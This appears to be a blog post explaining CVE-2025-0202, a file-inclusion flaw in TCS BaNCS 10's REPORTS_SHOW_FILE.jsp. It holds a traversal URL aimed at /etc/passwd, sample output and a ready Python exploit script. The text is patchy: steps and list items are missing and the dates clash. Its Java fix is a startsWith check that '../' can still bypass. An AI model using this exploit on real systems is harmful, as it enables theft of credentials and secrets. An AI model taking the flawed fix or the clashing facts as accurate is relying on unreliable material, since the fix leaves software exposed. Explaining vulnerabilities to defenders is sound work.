CVE CyberSecurity Database News

CVE-2025-0202 - File Inclusion in TCS BaNCS 10’s /REPORTS/REPORTS_SHOW_FILE.jsp – Explained and Exploited

Poster -

If you’re working in banking, you might have heard of TCS BaNCS, a widely-used banking software suite from Tata Consultancy Services. On June 2025, a new vulnerability, CVE-2025-0202, was found in TCS BaNCS 10. The flaw affects a core file, /REPORTS/REPORTS_SHOW_FILE.jsp, and is classified as “problematic”—but in the real world, it can be quite dangerous.

Let’s break down what CVE-2025-0202 is, how it happens, how it could be exploited, and how you can protect your bank or company.

What is CVE-2025-0202?

CVEs (Common Vulnerabilities and Exposures) are identifiers for publicly known cybersecurity flaws. Here’s how this one plays out:

Software: TCS BaNCS 10

- File Affected: /REPORTS/REPORTS_SHOW_FILE.jsp

Vulnerability Type: File Inclusion (Directory Traversal, Local File Inclusion)

Basically, attackers can make the application include files that it shouldn’t, simply by manipulating the FilePath argument in a web request.

Original reference:
- MITRE CVE-2025-0202 page *(Link placeholder for when published)*

Here’s a simplified version of what might happen in the JSP code

<%
    String filePath = request.getParameter("FilePath");
    FileInputStream fis = new FileInputStream(filePath);
    int c;
    while ((c = fis.read()) != -1) {
        out.write(c);
    }
    fis.close();
%>

It opens this file from the server’s file system and directly returns its contents.

- There’s no security check to make sure the file is safe to open. No input validation or filtering.

Step 1: Attacker’s Goal

Let’s say you’re an attacker and want to read the sensitive /etc/passwd file (on Linux) or C:\Windows\win.ini (on Windows).

You send a GET request to

https://bank.example.com/REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=../../../../../../etc/passwd

The ../../ part keeps moving up to the server’s root directory until it reaches /etc/passwd.

Step 3: Server Response

If the server user account has read permissions for the target file, it will respond with the full contents of the file.

Example output (partial)

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Here’s a simple Python script that automates the attack

import requests

base_url = 'https://bank.example.com/REPORTS/REPORTS_SHOW_FILE.jsp';
payload = '../../../../../../etc/passwd'  # Change for Windows targets

params = {'FilePath': payload}
r = requests.get(base_url, params=params, verify=False)

if r.status_code == 200 and 'root:' in r.text:
    print('Vulnerable! /etc/passwd contents:')
    print(r.text)
else:
    print('Not vulnerable or file not found.')

Note: This is for educational use only. Always have permission!

Read sensitive files: Configuration files, credentials, secret keys, and more.

- Chain with other exploits: Sometimes, attackers might discover or leak application source code or log files, which could reveal more flaws.

Deposit malware: If the attacker finds writable paths, they could escalate to code execution.

Remember: Simply restricting the input directory is NOT enough if users can still use ../ sequences!

Here’s what developers and sysadmins should do

1. Input Validation: Always sanitize and validate user inputs. Allow only whitelisted paths or files.

Patch: Update TCS BaNCS as soon as the vendor releases a fix.

4. Least Privilege: Make sure the web server runs with restricted permissions, so even if there’s a file read, damage is minimized.
5. Monitor and Alert: Monitor access to sensitive files and unexpected requests to /REPORTS/REPORTS_SHOW_FILE.jsp.

Example of input validation (in Java)

String filePath = request.getParameter("FilePath");

if (!filePath.startsWith("/var/reports/")) {
    response.sendError(HttpServletResponse.SC_FORBIDDEN, "Access denied.");
    return;
}

References and Further Reading

- Official CVE-2025-0202 entry (MITRE)
- OWASP Directory Traversal Cheat Sheet
- OWASP Local File Inclusion (LFI)

Conclusion

CVE-2025-0202 is a clear example of how simple mistakes—like not validating file paths—can lead to serious breaches. If you run TCS BaNCS 10 or any similar financial platforms, make it a priority to audit file-displaying code and patch fast.

Stay secure, and always keep an eye on the CVE feeds for vulnerabilities in your critical software!

Timeline

Published on: 01/04/2025 05:15:07 UTC